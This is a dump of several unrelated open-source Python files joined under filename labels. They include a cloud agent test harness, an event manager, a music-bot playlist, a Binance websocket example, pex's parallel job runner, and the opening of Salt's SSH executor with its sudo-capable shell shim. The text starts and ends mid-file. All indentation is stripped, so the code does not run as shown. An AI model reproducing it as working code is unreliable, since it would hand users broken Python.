self.launch_cloudagent(argument)
self.launch_cloudverifier(argument)
return True
def kill_required_servers(self, argument):
self.kill_cloudagent(argument)
self.kill_cloudverifier(argument)
return True
def new_thread(self, args):
#create a new uuid, and place it in the queue
the_global_queue = args[0]
new_uuid = str(uuid.uuid4())
the_global_queue.put(new_uuid)
return threading.Thread(target=self.request_task,args=args)
def execute_test_function_set(self, setup_or_state_change_or_validation):
# look up the test record
test_record = self.test_table.get(self._testMethodName)
#perform each of the test functions and store the results
change_or_validation = test_record.get(setup_or_state_change_or_validation)
if change_or_validation is not None:
for test_functions in test_record[setup_or_state_change_or_validation]:
# full_url = "http://" + test_functions.get("http_request_ip") + ":" + test_functions.get("http_request_port") + test_functions.get("http_request_path")
# http_request_body_tag = test_functions.get("http_request_body")
# http_request_body_file_tag = test_functions.get("http_request_body_file")
# if http_request_body_tag != None and http_request_body_file_tag != None :
# self.fail("Test " + self._testMethodName + ":" + test_functions["function_name"] + " contains both http_request_body and http_request_body_file tags." )
#
# thedata = ''
# if http_request_body_tag == None and http_request_body_file_tag != None:
# thedata = open(http_request_body_file_tag).read()
# else:
# thedata=http_request_body_tag
# verb = test_functions.get("http_request_verb")
# query = test_functions.get("http_request_query","")
# test_functions.get("http_request_header")
# req_header = test_functions.get("http_request_header")
concurrent_instances = None
concurrent_new_thread_function = None
concurrency_dict = test_functions.get("concurrency")
if concurrency_dict is not None:
concurrent_instances = concurrency_dict.get("instances")
concurrent_new_thread_function = concurrency_dict.get("new_thread_function")
if concurrent_instances is None or concurrent_new_thread_function is None:
self.fail("Test " + self._testMethodName + ":" + test_functions["function_name"] + ' contains concurrency agent without mandatory \\"instances\\" or and \\"new_thread_function\\" specifiers' )
for test_iteration in range(int(test_functions.get("test_iterations","1"))):
if concurrent_instances is None:
# do it inline on this thread
self.execute_the_test(setup_or_state_change_or_validation, test_functions, test_iteration)
else:
threads = []
for count in range(concurrent_instances):
args = (queue, setup_or_state_change_or_validation, test_functions, test_iteration)
# call the new_thread_function specified in the test table under concurrency tag.
# the new_thread_function is responsible for setting up the task, and creating the new thread.
# the task given to the thread must not block and call task_done() on completion regardless of success or failure
new_thread = getattr(self, concurrent_new_thread_function)(args)
threads.append(new_thread)
#start the threads
for t in threads:
t.start()
# blocks until all tasks have called task_done()
queue.join()
#blocks until all threads are complete
for t in threads:
t.join()
def execute_test_definition(self):
test_record = self.test_table.get(self._testMethodName)
prerun_function_dict = test_record.get("prerun_function")
if prerun_function_dict is not None:
prerun_function_name = prerun_function_dict.get("name")
prerun_function_args = prerun_function_dict.get("args")
function_return = getattr(self, prerun_function_name)(prerun_function_args)
self.execute_test_function_set("setup_functions")
self.execute_test_function_set("state_change_functions")
self.execute_test_function_set("state_validation_functions")
postrun_function_dict = test_record.get("postrun_function")
if postrun_function_dict is not None:
postrun_function_name = postrun_function_dict.get("name")
postrun_function_args = postrun_function_dict.get("args")
function_return = getattr(self, postrun_function_name)(postrun_function_args)
def setUp(self):
pass
def tearDown(self):
#os.killpg(self.cloudverifier_process.pid, signal.SIGKILL)
pass
if __name__ == "__main__":
#import sys;sys.argv = ['', 'Test.testName']
unittest.main()
|
eventsmanager.py | import threading
from time import sleep
def singleton(cls):
instance = [None]
def wrapper(*args, **kwargs):
if instance[0] is None:
instance[0] = cls(*args, **kwargs)
return instance[0]
return wrapper
def sameFunction(f1, f2): #used for unsubscribing, remove all subscriptions with a certain handler. Hacky, fix later.
if hasattr(f1, '__func__'):
f1 = f1.__func__
if hasattr(f2, '__func__'):
f2 = f2.__func__
return f1 is f2
@singleton
class EventsManager():
def __init__(self):
self.subscriptions = {}
self.eventsQueue = []
self.run()
def subscribe(self, topic, handler):
if topic in self.subscriptions:
handlers = self.subscriptions[topic]
else:
handlers = []
handlers.append(handler)
self.subscriptions[topic] = handlers
print("EventsManager: New subscription to %s" % topic)
def unsubscribe(self, handler):
for topic in self.subscriptions:
handlers = self.subscriptions[topic]
keep = []
for h in handlers:
if sameFunction(h, handler) and h.__self__ == handler.__self__:
print("EventsManager: Removing subscription to", topic)
else:
keep.append(h)
self.subscriptions[topic] = keep
def publish(self, topic, message):
message["topic"] = topic
self.eventsQueue.append(message)
def handleEvents(self):
while True:
try:
handlers = []
message = self.eventsQueue.pop(0)
try:
handlers = self.subscriptions[message["topic"]]
for handler in handlers:
handler(message)
except:
pass
except:
pass
def run(self):
t = threading.Thread(target=self.handleEvents)
t.start() |
playlist.py | import json
import threading
import logging
import random
import time
import variables as var
from media.cache import (CachedItemWrapper, ItemNotCachedError,
get_cached_wrapper_from_dict, get_cached_wrapper_by_id)
from database import Condition
from media.item import ValidationFailedError, PreparationFailedError
def get_playlist(mode, _list=None, _index=None):
index = -1
if _list and _index is None:
index = _list.current_index
if _list is None:
if mode == "one-shot":
return OneshotPlaylist()
elif mode == "repeat":
return RepeatPlaylist()
elif mode == "random":
return RandomPlaylist()
elif mode == "autoplay":
return AutoPlaylist()
else:
if mode == "one-shot":
return OneshotPlaylist().from_list(_list, index)
elif mode == "repeat":
return RepeatPlaylist().from_list(_list, index)
elif mode == "random":
return RandomPlaylist().from_list(_list, index)
elif mode == "autoplay":
return AutoPlaylist().from_list(_list, index)
raise
class BasePlaylist(list):
def __init__(self):
super().__init__()
self.current_index = -1
self.version = 0 # increase by one after each change
self.mode = "base" # "repeat", "random"
self.pending_items = []
self.log = logging.getLogger("bot")
self.validating_thread_lock = threading.Lock()
self.playlist_lock = threading.RLock()
def is_empty(self):
return True if len(self) == 0 else False
def from_list(self, _list, current_index):
self.version += 1
super().clear()
self.extend(_list)
self.current_index = current_index
return self
def append(self, item: CachedItemWrapper):
with self.playlist_lock:
self.version += 1
super().append(item)
self.pending_items.append(item)
self.async_validate()
return item
def insert(self, index, item):
with self.playlist_lock:
self.version += 1
if index == -1:
index = self.current_index
super().insert(index, item)
if index <= self.current_index:
self.current_index += 1
self.pending_items.append(item)
self.async_validate()
return item
def extend(self, items):
with self.playlist_lock:
self.version += 1
super().extend(items)
self.pending_items.extend(items)
self.async_validate()
return items
def next(self):
with self.playlist_lock:
if len(self) == 0:
return False
if self.current_index < len(self) - 1:
self.current_index += 1
return self[self.current_index]
else:
return False
def point_to(self, index):
with self.playlist_lock:
if -1 <= index < len(self):
self.current_index = index
def find(self, id):
with self.playlist_lock:
for index, wrapper in enumerate(self):
if wrapper.item.id == id:
return index
return None
def __delitem__(self, key):
return self.remove(key)
def remove(self, index):
with self.playlist_lock:
self.version += 1
if index > len(self) - 1:
return False
removed = self[index]
super().__delitem__(index)
if self.current_index > index:
self.current_index -= 1
# reference counter
counter = 0
for wrapper in self:
if wrapper.id == removed.id:
counter += 1
if counter == 0:
var.cache.free(removed.id)
return removed
def remove_by_id(self, id):
to_be_removed = []
for index, wrapper in enumerate(self):
if wrapper.id == id:
to_be_removed.append(index)
if to_be_removed:
self.version += 1
for index in to_be_removed:
self.remove(index)
def current_item(self):
with self.playlist_lock:
if len(self) == 0:
return False
return self[self.current_index]
def next_index(self):
with self.playlist_lock:
if self.current_index < len(self) - 1:
return self.current_index + 1
return False
def next_item(self):
with self.playlist_lock:
if self.current_index < len(self) - 1:
return self[self.current_index + 1]
return False
def randomize(self):
with self.playlist_lock:
# current_index will lose track after shuffling, thus we take current music out before shuffling
# current = self.current_item()
# del self[self.current_index]
random.shuffle(self)
# self.insert(0, current)
self.current_index = -1
self.version += 1
def clear(self):
with self.playlist_lock:
self.version += 1
self.current_index = -1
super().clear()
var.cache.free_all()
def save(self):
with self.playlist_lock:
var.db.remove_section("playlist_item")
assert self.current_index is not None
var.db.set("playlist", "current_index", self.current_index)
for index, music in enumerate(self):
var.db.set("playlist_item", str(index), json.dumps({'id': music.id, 'user': music.user}))
def load(self):
current_index = var.db.getint("playlist", "current_index", fallback=-1)
if current_index == -1:
return
items = var.db.items("playlist_item")
if items:
music_wrappers = []
items.sort(key=lambda v: int(v[0]))
for item in items:
item = json.loads(item[1])
music_wrapper = get_cached_wrapper_by_id(item['id'], item['user'])
if music_wrapper:
music_wrappers.append(music_wrapper)
self.from_list(music_wrappers, current_index)
def _debug_print(self):
print("===== Playlist(%d) =====" % self.current_index)
for index, item_wrapper in enumerate(self):
if index == self.current_index:
print("-> %d %s" % (index, item_wrapper.format_debug_string()))
else:
print("%d %s" % (index, item_wrapper.format_debug_string()))
print("===== End =====")
def async_validate(self):
if not self.validating_thread_lock.locked():
time.sleep(0.1) # Just avoid validation finishes too fast and delete songs while something is reading it.
th = threading.Thread(target=self._check_valid, name="Validating")
th.daemon = True
th.start()
def _check_valid(self):
self.log.debug("playlist: start validating...")
self.validating_thread_lock.acquire()
while len(self.pending_items) > 0:
item = self.pending_items.pop()
try:
item.item()
except ItemNotCachedError:
# In some very subtle case, items are removed and freed from
# the playlist and the cache, before validation even starts,
# causes, freed items remain in pending_items.
# Simply ignore these items here.
continue
self.log.debug("playlist: validating %s" % item.format_debug_string())
ver = item.version
try:
item.validate()
except ValidationFailedError as e:
self.log.debug("playlist: validating failed.")
if var.bot:
var.bot.send_channel_msg(e.msg)
self.remove_by_id(item.id)
var.cache.free_and_delete(item.id)
continue
if item.version > ver:
self.version += 1
self.log.debug("playlist: validating finished.")
self.validating_thread_lock.release()
class OneshotPlaylist(BasePlaylist):
def __init__(self):
super().__init__()
self.mode = "one-shot"
self.current_index = -1
def current_item(self):
with self.playlist_lock:
if len(self) == 0:
self.current_index = -1
return False
if self.current_index == -1:
self.current_index = 0
return self[self.current_index]
def from_list(self, _list, current_index):
with self.playlist_lock:
if len(_list) > 0:
if current_index > -1:
for i in range(current_index):
_list.pop(0)
return super().from_list(_list, 0)
return super().from_list(_list, -1)
return self
def next(self):
with self.playlist_lock:
if len(self) > 0:
self.version += 1
if self.current_index != -1:
super().__delitem__(self.current_index)
if len(self) == 0:
return False
else:
self.current_index = 0
return self[0]
else:
self.current_index = -1
return False
def next_index(self):
if len(self) > 1:
return 1
else:
return False
def next_item(self):
if len(self) > 1:
return self[1]
else:
return False
def point_to(self, index):
with self.playlist_lock:
self.version += 1
self.current_index = -1
for i in range(index):
super().__delitem__(0)
class RepeatPlaylist(BasePlaylist):
def __init__(self):
super().__init__()
self.mode = "repeat"
def next(self):
with self.playlist_lock:
if len(self) == 0:
return False
if self.current_index < len(self) - 1:
self.current_index += 1
return self[self.current_index]
else:
self.current_index = 0
return self[0]
def next_index(self):
with self.playlist_lock:
if self.current_index < len(self) - 1:
return self.current_index + 1
else:
return 0
def next_item(self):
if len(self) == 0:
return False
return self[self.next_index()]
class RandomPlaylist(BasePlaylist):
def __init__(self):
super().__init__()
self.mode = "random"
def from_list(self, _list, current_index):
self.version += 1
random.shuffle(_list)
return super().from_list(_list, -1)
def next(self):
with self.playlist_lock:
if len(self) == 0:
return False
if self.current_index < len(self) - 1:
self.current_index += 1
return self[self.current_index]
else:
self.version += 1
self.randomize()
self.current_index = 0
return self[0]
class AutoPlaylist(OneshotPlaylist):
def __init__(self):
super().__init__()
self.mode = "autoplay"
def refresh(self):
dicts = var.music_db.query_random_music(var.config.getint("bot", "autoplay_length"),
Condition().and_not_sub_condition(
Condition().and_like('tags', "%don't autoplay,%")))
if dicts:
_list = [get_cached_wrapper_from_dict(_dict, "AutoPlay") for _dict in dicts]
self.from_list(_list, -1)
# def from_list(self, _list, current_index):
# self.version += 1
# self.refresh()
# return self
def clear(self):
super().clear()
self.refresh()
def next(self):
if len(self) == 0:
self.refresh()
return super().next()
|
example_subscribe.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# File: example_subscribe.py
#
# Part of ‘UNICORN Binance WebSocket API’
# Project website: https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api
# Documentation: https://oliver-zehentleitner.github.io/unicorn-binance-websocket-api
# PyPI: https://pypi.org/project/unicorn-binance-websocket-api/
#
# Author: Oliver Zehentleitner
# https://about.me/oliver-zehentleitner
#
# Copyright (c) 2019-2020, Oliver Zehentleitner
# All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from unicorn_binance_websocket_api.unicorn_binance_websocket_api_manager import BinanceWebSocketApiManager
import logging
import time
import threading
import os
# https://docs.python.org/3/library/logging.html#logging-levels
logging.basicConfig(level=logging.INFO,
filename=os.path.basename(__file__) + '.log',
format="{asctime} [{levelname:8}] {process} {thread} {module}: {message}",
style="{")
def print_stream_data_from_stream_buffer(binance_websocket_api_manager):
while True:
if binance_websocket_api_manager.is_manager_stopping():
exit(0)
oldest_stream_data_from_stream_buffer = binance_websocket_api_manager.pop_stream_data_from_stream_buffer()
if oldest_stream_data_from_stream_buffer is False:
time.sleep(0.01)
else:
#print(oldest_stream_data_from_stream_buffer)
pass
binance_websocket_api_manager = BinanceWebSocketApiManager(exchange="binance.com")
# start a worker process to move the received stream_data from the stream_buffer to a print function
worker_thread = threading.Thread(target=print_stream_data_from_stream_buffer, args=(binance_websocket_api_manager,))
worker_thread.start()
markets = ['bnbbtc', 'ethbtc', 'btcusdt', 'bchabcusdt', 'xrpusdt', 'rvnbtc', 'ltcusdt', 'adausdt', 'eosusdt',
'neousdt', 'bnbusdt', 'adabtc', 'ethusdt', 'trxbtc', 'trxbtc', 'bchabcbtc', 'ltcbtc', 'xrpbtc',
'ontbtc', 'bttusdt', 'eosbtc', 'xlmbtc', 'bttbtc', 'tusdusdt', 'xlmusdt', 'qkcbtc', 'zrxbtc',
'neobtc', 'adaeth', 'icxusdt', 'btctusd', 'icxbtc', 'btcusdc', 'wanbtc', 'zecbtc', 'wtcbtc']
channels = ['trade', 'kline_1m', 'kline_5m', 'kline_15m', 'kline_30m', 'kline_1h', 'kline_12h', 'depth5']
markets_1 = ['bnbbtc', 'ethbtc']
channels_1 = ['trade', 'kline_1m', '!ticker']
stream_id = binance_websocket_api_manager.create_stream(channels_1, markets_1)
markets_2 = ['batbtc', 'adabnb', 'etcusdt', 'qtumusdt', 'xmrbtc', 'trxeth', 'adatusd', 'trxxrp', 'trxbnb',
'dashbtc', 'rvnbnb', 'bchabctusd', 'etcbtc', 'bnbeth', 'ethpax', 'nanobtc', 'xembtc']
binance_websocket_api_manager.subscribe_to_stream(stream_id, markets=markets_2)
markets_3 = ['!miniTicker']
binance_websocket_api_manager.subscribe_to_stream(stream_id, markets=markets_3)
markets_4 = ['engbtc', 'zileth', 'xlmeth', 'eosbnb', 'xrppax', 'lskbtc', 'npxsbtc', 'xmrusdt', 'ltcpax', 'xmrusdt',
'ethtusd', 'batusdt', 'mcobtc', 'neoeth', 'bntbtc', 'eostusd', 'lrcbtc', 'funbtc', 'zecusdt',
'bnbpax', 'linkusdt', 'hceth', 'zrxeth', 'icxeth', 'xmreth', 'neobnb', 'etceth', 'zeceth', 'xmrbnb',
'wanbnb', 'zrxbnb', 'agibnb', 'funeth', 'arketh', 'engeth']
binance_websocket_api_manager.subscribe_to_stream(stream_id, markets=markets_4)
time.sleep(1)
binance_websocket_api_manager.get_stream_subscriptions(stream_id)
time.sleep(2)
channels_2 = ['trade', 'kline_5m', 'kline_15m', 'kline_30m', 'kline_1h', 'kline_12h', 'depth5']
binance_websocket_api_manager.unsubscribe_from_stream(stream_id, channels=channels_2)
request_id = binance_websocket_api_manager.get_stream_subscriptions(stream_id)
while binance_websocket_api_manager.get_result_by_request_id(request_id) is False:
print("Wait to receive the result!")
time.sleep(0.5)
print(str(binance_websocket_api_manager.get_result_by_request_id(request_id)))
time.sleep(10)
while True:
#binance_websocket_api_manager.print_summary()
binance_websocket_api_manager.print_stream_info(stream_id)
#binance_websocket_api_manager.get_stream_subscriptions(stream_id)
time.sleep(1)
|
jobs.py | # Copyright 2019 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import absolute_import
import errno
from abc import abstractmethod
from collections import namedtuple
from threading import BoundedSemaphore, Event, Thread
from pex.compatibility import AbstractClass, Queue, cpu_count
from pex.tracer import TRACER
class Job(object):
"""Represents a job spawned as a subprocess.
Presents a similar API to `subprocess` except where noted.
"""
class Error(Exception):
"""Indicates that a Job exited non-zero."""
def __init__(self, pid, command, exitcode, stderr, message):
super(Job.Error, self).__init__(message)
self.pid = pid
self.command = command
self.exitcode = exitcode
self.stderr = stderr
def __init__(self, command, process):
"""
:param command: The command used to spawn the job process.
:type command: list of str
:param process: The spawned process handle.
:type process: :class:`subprocess.Popen`
"""
self._command = tuple(command)
self._process = process
def wait(self):
"""Waits for the job to complete.
:raises: :class:`Job.Error` if the job exited non-zero.
"""
self._process.wait()
self._check_returncode()
def communicate(self, input=None):
"""Communicates with the job sending any input data to stdin and collecting stdout and
stderr.
:param input: Data to send to stdin of the job as per the `subprocess` API.
:return: A tuple of the job's stdout and stderr as per the `subprocess` API.
:raises: :class:`Job.Error` if the job exited non-zero.
"""
stdout, stderr = self._process.communicate(input=input)
self._check_returncode(stderr)
return stdout, stderr
def kill(self):
"""Terminates the job if it is still running.
N.B.: This method is idempotent.
"""
try:
self._process.kill()
except OSError as e:
if e.errno != errno.ESRCH:
raise e
def _check_returncode(self, stderr=None):
if self._process.returncode != 0:
msg = "Executing {} failed with {}".format(
" ".join(self._command), self._process.returncode
)
if stderr:
stderr = stderr.decode("utf-8")
msg += "\nSTDERR:\n{}".format(stderr)
raise self.Error(
pid=self._process.pid,
command=self._command,
exitcode=self._process.returncode,
stderr=stderr,
message=msg,
)
def __str__(self):
return "pid: {pid} -> {command}".format(
pid=self._process.pid, command=" ".join(self._command)
)
class SpawnedJob(object):
"""A handle to a spawned :class:`Job` and its associated result."""
@classmethod
def completed(cls, result):
"""Wrap an already completed result in a SpawnedJob.
The returned job will no-op when `kill` is called since the job is already completed.
:param result: The completed result.
:return: A spawned job whose result is already complete.
:rtype: :class:`SpawnedJob`
"""
class Completed(SpawnedJob):
def __init__(self):
super(Completed, self).__init__(job=None, result_func=lambda: result)
def kill(self):
pass
def __str__(self):
return "SpawnedJob.completed({})".format(result)
return Completed()
@classmethod
def wait(cls, job, result):
"""Wait for the job to complete and return a fixed result upon success.
:param job: The spawned job.
:type job: :class:`Job`
:param result: The fixed success result.
:return: A spawned job whose result is a side effect of the job (a written file, a populated
directory, etc.).
:rtype: :class:`SpawnedJob`
"""
def wait_result_func():
job.wait()
return result
return cls(job=job, result_func=wait_result_func)
@classmethod
def stdout(cls, job, result_func, input=None):
"""Wait for the job to complete and return a result derived from its stdout.
:param job: The spawned job.
:type job: :class:`Job`
:param result_func: A function taking the stdout byte string collected from the spawned job and
returning the desired result.
:param input: Optional input stream data to pass to the process as per the
`subprocess.Popen.communicate` API.
:return: A spawned job whose result is derived from stdout contents.
:rtype: :class:`SpawnedJob`
"""
def stdout_result_func():
stdout, _ = job.communicate(input=input)
return result_func(stdout)
return cls(job=job, result_func=stdout_result_func)
def __init__(self, job, result_func):
"""Not intended for direct use, see `wait` and `stdout` factories."""
self._job = job
self._result_func = result_func
def await_result(self):
"""Waits for the spawned job to complete and returns its result."""
return self._result_func()
def kill(self):
"""Terminates the spawned job if it's not already complete."""
self._job.kill()
def __str__(self):
return str(self._job)
# If `cpu_count` fails, we default to 2. This is relatively arbitrary, based on what seems to be
# common in CI.
_CPU_COUNT = cpu_count() or 2
_ABSOLUTE_MAX_JOBS = _CPU_COUNT * 2
DEFAULT_MAX_JOBS = _CPU_COUNT
"""The default maximum number of parallel jobs PEX should use."""
def _sanitize_max_jobs(max_jobs=None):
assert max_jobs is None or isinstance(max_jobs, int)
if max_jobs is None or max_jobs <= 0:
return DEFAULT_MAX_JOBS
else:
return min(max_jobs, _ABSOLUTE_MAX_JOBS)
class ErrorHandler(AbstractClass): # type: ignore[valid-type, misc]
"""Handles errors encountered in the context of spawning and awaiting the result of a `Job`."""
@classmethod
def spawn_error_message(cls, item, exception):
return "Failed to spawn a job for {item}: {exception}".format(
item=item, exception=exception
)
@classmethod
def job_error_message(cls, _item, job_error):
return "pid {pid} -> {command} exited with {exitcode} and STDERR:\n{stderr}".format(
pid=job_error.pid,
command=" ".join(job_error.command),
exitcode=job_error.exitcode,
stderr=job_error.stderr,
)
@abstractmethod
def handle_spawn_error(self, item, exception):
"""Handle an error encountered spawning a job.
:param item: The item that was the input for the spawned job.
:param exception: The exception encountered attempting to spawn the job for `item`.
:type exception: :class:`Exception`
:returns: A value to represent the failed processing of the item or else `None` to skip
processing of the item altogether.
:raise: To indicate all item processing should be cancelled and the exception raised.
"""
@abstractmethod
def handle_job_error(self, item, job_error):
"""Handle a job that exits unsuccessfully.
:param item: The item that was the input for the spawned job.
:param job_error: An error capturing the details of the job failure.
:type job_error: :class:`Job.Error`
:returns: A value to represent the failed processing of the item or else `None` to skip
processing of the item altogether.
:raise: To indicate all item processing should be cancelled and the exception raised.
"""
class Raise(ErrorHandler):
"""Re-raises errors encountered spawning or awaiting the result of a `Job`."""
def __init__(self, raise_type):
"""
:param raise_type: The type of exception to raise when a `Job` fails.
:type raise_type: An :class:`Exception` subclass.
"""
self._raise_type = raise_type
def handle_spawn_error(self, item, exception):
raise self._raise_type(self.spawn_error_message(item, exception))
def handle_job_error(self, item, job_error):
raise self._raise_type(self.job_error_message(item, job_error))
class Retain(ErrorHandler):
"""Retains errors encountered spawning or awaiting the result of a `Job`.
The retained errors are returned as the result of the failed `Job` in the form of (item, error)
tuples. In the case of a spawn failure, the error item is likely an instance of `OSError`. In
the case of the `Job` failing (exiting non-zero), the error will be an instance of `Job.Error`.
"""
def handle_spawn_error(self, item, exception):
return item, exception
def handle_job_error(self, item, job_error):
return item, job_error
class Log(ErrorHandler):
"""Logs errors encountered spawning or awaiting the result of a `Job`."""
def handle_spawn_error(self, item, exception):
TRACER.log(self.spawn_error_message(item, exception))
return None
def handle_job_error(self, item, job_error):
TRACER.log(self.job_error_message(item, job_error))
return None
def execute_parallel(inputs, spawn_func, error_handler=None, max_jobs=None):
"""Execute jobs for the given inputs in parallel.
:param int max_jobs: The maximum number of parallel jobs to spawn.
:param inputs: An iterable of the data to parallelize over `spawn_func`.
:param spawn_func: A function taking a single input and returning a :class:`SpawnedJob`.
:param error_handler: An optional :class:`ErrorHandler`, defaults to :class:`Log`.
:returns: An iterator over the spawned job results as they come in.
:raises: A `raise_type` exception if any individual job errors and `raise_type` is not `None`.
"""
error_handler = error_handler or Log()
if not isinstance(error_handler, ErrorHandler):
raise ValueError(
"Given error_handler {} of type {}, expected an {}".format(
error_handler, type(error_handler), ErrorHandler
)
)
size = _sanitize_max_jobs(max_jobs)
TRACER.log(
"Spawning a maximum of {} parallel jobs to process:\n {}".format(
size, "\n ".join(map(str, inputs))
),
V=9,
)
class Spawn(namedtuple("Spawn", ["item", "spawned_job"])):
pass
class SpawnError(namedtuple("SpawnError", ["item", "error"])):
pass
stop = Event() # Used as a signal to stop spawning further jobs once any one job fails.
job_slots = BoundedSemaphore(value=size)
done_sentinel = object()
spawn_queue = Queue() # Queue[Union[Spawn, SpawnError, Literal[done_sentinel]]]
def spawn_jobs():
for item in inputs:
if stop.is_set():
break
job_slots.acquire()
try:
result = Spawn(item, spawn_func(item))
except Exception as e:
result = SpawnError(item, e)
finally:
spawn_queue.put(result)
spawn_queue.put(done_sentinel)
spawner = Thread(name="PEX Parallel Job Spawner", target=spawn_jobs)
spawner.daemon = True
spawner.start()
error = None
while True:
spawn_result = spawn_queue.get()
if spawn_result is done_sentinel:
if error:
raise error
return
try:
if isinstance(spawn_result, SpawnError):
try:
result = error_handler.handle_spawn_error(spawn_result.item, spawn_result.error)
if result is not None:
yield result
except Exception as e:
# Fail fast and proceed to kill all outstanding spawned jobs.
stop.set()
error = e
elif (
error is not None
): # I.E.: `item` is not an exception, but there was a prior exception.
spawn_result.spawned_job.kill()
else:
try:
yield spawn_result.spawned_job.await_result()
except Job.Error as e:
try:
result = error_handler.handle_job_error(spawn_result.item, e)
if result is not None:
yield result
except Exception as e:
# Fail fast and proceed to kill all outstanding spawned jobs.
stop.set()
error = e
finally:
job_slots.release()
|
__init__.py | """
Create ssh executor system
"""
import base64
import binascii
import copy
import datetime
import getpass
import hashlib
import logging
import multiprocessing
import os
import re
import subprocess
import sys
import tarfile
import tempfile
import time
import uuid
import salt.client.ssh.shell
import salt.client.ssh.wrapper
import salt.config
import salt.defaults.exitcodes
import salt.exceptions
import salt.loader
import salt.log
import salt.minion
import salt.output
import salt.roster
import salt.serializers.yaml
import salt.state
import salt.utils.args
import salt.utils.atomicfile
import salt.utils.event
import salt.utils.files
import salt.utils.hashutils
import salt.utils.json
import salt.utils.network
import salt.utils.path
import salt.utils.stringutils
import salt.utils.thin
import salt.utils.url
import salt.utils.verify
from salt.template import compile_template
from salt.utils.platform import is_junos, is_windows
from salt.utils.process import Process
from salt.utils.zeromq import zmq
try:
import saltwinshell
HAS_WINSHELL = True
except ImportError:
HAS_WINSHELL = False
# The directory where salt thin is deployed
DEFAULT_THIN_DIR = "/var/tmp/.%%USER%%_%%FQDNUUID%%_salt"
# RSTR is just a delimiter to distinguish the beginning of salt STDOUT
# and STDERR. There is no special meaning. Messages prior to RSTR in
# stderr and stdout are either from SSH or from the shim.
#
# RSTR on both stdout and stderr:
# no errors in SHIM - output after RSTR is from salt
# No RSTR in stderr, RSTR in stdout:
# no errors in SSH_SH_SHIM, but SHIM commands for salt master are after
# RSTR in stdout
# No RSTR in stderr, no RSTR in stdout:
# Failure in SHIM
# RSTR in stderr, No RSTR in stdout:
# Undefined behavior
RSTR = "_edbc7885e4f9aac9b83b35999b68d015148caf467b78fa39c05f669c0ff89878"
# The regex to find RSTR in output - Must be on an output line by itself
# NOTE - must use non-grouping match groups or output splitting will fail.
RSTR_RE = r"(?:^|\r?\n)" + RSTR + r"(?:\r?\n|$)"
# METHODOLOGY:
#
# 1) Make the _thinnest_ /bin/sh shim (SSH_SH_SHIM) to find the python
# interpreter and get it invoked
# 2) Once a qualified python is found start it with the SSH_PY_SHIM
# 3) The shim is converted to a single semicolon separated line, so
# some constructs are needed to keep it clean.
# NOTE:
# * SSH_SH_SHIM is generic and can be used to load+exec *any* python
# script on the target.
# * SSH_PY_SHIM is in a separate file rather than stuffed in a string
# in salt/client/ssh/__init__.py - this makes testing *easy* because
# it can be invoked directly.
# * SSH_PY_SHIM is base64 encoded and formatted into the SSH_SH_SHIM
# string. This makes the python script "armored" so that it can
# all be passed in the SSH command and will not need special quoting
# (which likely would be impossibe to do anyway)
# * The formatted SSH_SH_SHIM with the SSH_PY_SHIM payload is a bit
# big (~7.5k). If this proves problematic for an SSH command we
# might try simply invoking "/bin/sh -s" and passing the formatted
# SSH_SH_SHIM on SSH stdin.
# NOTE: there are two passes of formatting:
# 1) Substitute in static values
# - EX_THIN_PYTHON_INVALID - exit code if a suitable python is not found
# 2) Substitute in instance-specific commands
# - DEBUG - enable shim debugging (any non-zero string enables)
# - SUDO - load python and execute as root (any non-zero string enables)
# - SSH_PY_CODE - base64-encoded python code to execute
# - SSH_PY_ARGS - arguments to pass to python code
# This shim generically loads python code . . . and *no* more.
# - Uses /bin/sh for maximum compatibility - then jumps to
# python for ultra-maximum compatibility.
#
# 1. Identify a suitable python
# 2. Jump to python
# Note the list-comprehension syntax to define SSH_SH_SHIM is needed
# to be able to define the string with indentation for readability but
# still strip the white space for compactness and to avoid issues with
# some multi-line embedded python code having indentation errors
SSH_SH_SHIM = "\n".join(
[
s.strip()
for s in r'''/bin/sh << 'EOF'
set -e
set -u
DEBUG="{{DEBUG}}"
if [ -n "$DEBUG" ]
then set -x
fi
SET_PATH="{{SET_PATH}}"
if [ -n "$SET_PATH" ]
then export PATH={{SET_PATH}}
fi
SUDO=""
if [ -n "{{SUDO}}" ]
then SUDO="sudo "
fi
SUDO_USER="{{SUDO_USER}}"
if [ "$SUDO" ] && [ "$SUDO_USER" ]
then SUDO="sudo -u {{SUDO_USER}}"
elif [ "$SUDO" ] && [ -n "$SUDO_USER" ]
then SUDO="sudo "
fi
EX_PYTHON_INVALID={EX_THIN_PYTHON_INVALID}
PYTHON_CMDS="python3 python27 python2.7 python26 python2.6 python2 python"
for py_cmd in $PYTHON_CMDS
do
if command -v "$py_cmd" >/dev/null 2>&1 && "$py_cmd" -c "import sys; sys.exit(not (sys.version_info >= (2, 6)));"
then
py_cmd_path=`"$py_cmd" -c 'from __future__ import print_function;import sys; print(sys.executable);'`
cmdpath=`command -v $py_cmd 2>/dev/null || which $py_cmd 2>/dev/null`
if file $cmdpath | grep "shell script" > /dev/null
then
ex_vars="'PATH', 'LD_LIBRARY_PATH', 'MANPATH', \
'XDG_DATA_DIRS', 'PKG_CONFIG_PATH'"
export `$py_cmd -c \
"from __future__ import print_function;
import sys;
import os;
map(sys.stdout.write, ['{{{{0}}}}={{{{1}}}} ' \
.format(x, os.environ[x]) for x in [$ex_vars]])"`
exec $SUDO PATH=$PATH LD_LIBRARY_PATH=$LD_LIBRARY_PATH \
